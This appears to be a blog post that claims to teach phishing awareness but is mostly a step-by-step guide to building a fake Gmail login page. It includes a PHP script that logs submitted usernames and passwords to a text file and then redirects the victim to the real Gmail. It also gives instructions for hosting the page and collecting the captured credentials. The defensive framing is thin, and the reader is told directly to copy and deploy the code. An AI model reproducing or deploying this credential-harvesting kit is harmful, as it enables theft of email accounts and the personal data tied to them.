0


Friends, i already introduced the working and introduction to Phishing, now i am going to provide details of how hackers use phishing to hack your Gmail account.
Below I will show a simple example of some of the steps a hacker might take to create a phishing website.
By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail,
he also gets access to a load of other user information for all the other websites you use. In this example
we will pretend the hacker chose Gmail as his target.
2. After choosing his target, the hacker will create a perfect replica of target site's login page.
3. Once you have created it , rename untitled.html to index.html. The reason you want to name it “index”
is so when you upload it to a web host and someone goes to your link, the index page is the first page that
shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information.
Below is a simple PHP script that logs and stores your login details when you click “Sign in”.
To see how it works, copy and paste the following code into notepad. Next save it into the same directory
as you saved the Gmail page, and name it log.php. In addition to the log.php page, create a new empty text file
and name it log.txt.
****************************************************************************
<?php
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=
false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=
1k96igf4806cy&ltmpl=default&ltmplcache=2 “);
$handle = fopen(“log.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
Fwrite($handle, “rn”);
fclose($handle);
exit;
?>
*******************************************************************************:
5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker
would do, open up the main Gmail page named index.html with notepad.
6. He redirect the sign in process to log.php.
This will make the form submit to your PHP phish script instead of to Google.
7. Save and close the file.
8. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search
you can come up with a bunch that fall under this category.
9. Once all the files are uploaded, you must give writing permissions to the “log.txt” file.
10. Once everything is up and ready to go, go to the link your host provided you for your website and you
should see the Gmail page replica. Type in a username/password and click Sign in. This should have
redirected you to the real Gmail page.
11. Now go take a look at your log.txt file by going through your hosting file manager or going to
http://www.yourwebhosturl.com/youraccount/log.txt. Although this is the most common, the web host you
use may provide a different looking URL.

Post a Comment Blogger

 
Top